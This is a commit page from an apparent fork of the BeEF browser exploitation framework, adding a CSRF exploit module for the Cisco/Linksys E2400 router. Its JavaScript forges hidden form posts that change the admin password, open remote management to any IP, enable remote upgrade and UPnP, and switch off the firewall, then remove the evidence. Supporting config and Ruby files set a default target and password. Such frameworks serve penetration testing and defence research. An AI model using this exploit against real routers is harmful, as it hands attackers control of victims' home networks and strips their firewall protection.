Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Added Cisco E2400 CSRF router module

Browse Source
This commit is contained in:
bcoles
2012-07-14 22:44:58 +09:30
parent 4d262d6d19
commit 9d2022531c
3 changed files with 131 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

77
modules/exploits/router/cisco_e2400_csrf/command.js Normal file
View File

@@ -0,0 +1,77 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
var gateway = '<%= @base %>';
var passwd = '<%= @password %>';
var cisco_e2400_iframe1 = beef.dom.createIframeXsrfForm(gateway + "apply.cgi", "POST",
[
{'type':'hidden', 'name':'submit_button', 'value':'Management'},
{'type':'hidden', 'name':'change_action', 'value':''},
{'type':'hidden', 'name':'action', 'value':'Apply'},
{'type':'hidden', 'name':'PasswdModify', 'value':'0'},
{'type':'hidden', 'name':'http_enable', 'value':'1'},
{'type':'hidden', 'name':'https_enable', 'value':'1'},
{'type':'hidden', 'name':'ctm404_enable', 'value':''},
{'type':'hidden', 'name':'remote_mgt_https', 'value':'1'},
{'type':'hidden', 'name':'wait_time', 'value':'4'},
{'type':'hidden', 'name':'need_reboot', 'value':'0'},
{'type':'hidden', 'name':'http_passwd', 'value':passwd},
{'type':'hidden', 'name':'http_passwdConfirm','value':passwd},
{'type':'hidden', 'name':'_http_enable', 'value':'1'},
{'type':'hidden', 'name':'_https_enable', 'value':'1'},
{'type':'hidden', 'name':'web_wl_filter', 'value':'0'},
{'type':'hidden', 'name':'remote_management', 'value':'1'},
{'type':'hidden', 'name':'_remote_mgt_https', 'value':'1'},
{'type':'hidden', 'name':'remote_upgrade', 'value':'1'},
{'type':'hidden', 'name':'remote_ip_any', 'value':'1'},
{'type':'hidden', 'name':'http_wanport', 'value':'8080'},
{'type':'hidden', 'name':'nf_alg_sip', 'value':'0'},
{'type':'hidden', 'name':'ctf_disable', 'value':'0'},
{'type':'hidden', 'name':'upnp_enable', 'value':'1'},
{'type':'hidden', 'name':'upnp_config', 'value':'0'},
{'type':'hidden', 'name':'upnp_internet_dis', 'value':'0'},
]);
var cisco_e2400_iframe2 = beef.dom.createIframeXsrfForm(gateway + "apply.cgi", "POST",
[
{'type':'hidden', 'name':'submit_button', 'value':'Firewall'},
{'type':'hidden', 'name':'change_action', 'value':''},
{'type':'hidden', 'name':'action', 'value':'Apply'},
{'type':'hidden', 'name':'block_wan', 'value':'0'},
{'type':'hidden', 'name':'block_loopback', 'value':'0'},
{'type':'hidden', 'name':'multicast_pass', 'value':'1'},
{'type':'hidden', 'name':'ipv6_multicast_pass', 'value':'1'},
{'type':'hidden', 'name':'ident_pass', 'value':'0'},
{'type':'hidden', 'name':'block_cookie', 'value':'0'},
{'type':'hidden', 'name':'block_java', 'value':'0'},
{'type':'hidden', 'name':'block_proxy', 'value':'0'},
{'type':'hidden', 'name':'block_activex', 'value':'0'},
{'type':'hidden', 'name':'wait_time', 'value':'3'},
{'type':'hidden', 'name':'ipv6_filter', 'value':'off'},
{'type':'hidden', 'name':'filter', 'value':'off'}
]);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
cleanup = function() {
document.body.removeChild(cisco_e2400_iframe1);
document.body.removeChild(cisco_e2400_iframe2);
}
setTimeout("cleanup()", 15000);
});

25
modules/exploits/router/cisco_e2400_csrf/config.yaml Normal file
View File

@@ -0,0 +1,25 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
cisco_e2400_csrf:
enable: true
category: ["Exploits", "Router"]
name: "Cisco E2400 CSRF"
description: "Attempts to enable remote administration on HTTPS port 443, disable the firewall, and change the password on a Cisco/Linksys E2400 router."
authors: ["bcoles", "n0x00"]
target:
working: ["ALL"]

29
modules/exploits/router/cisco_e2400_csrf/module.rb Normal file
View File

@@ -0,0 +1,29 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Cisco_e2400_csrf < BeEF::Core::Command
def self.options
return [
{'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.100.2/'},
{'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}
]
end
def post_execute
save({'result' => @datastore['result']})
end
end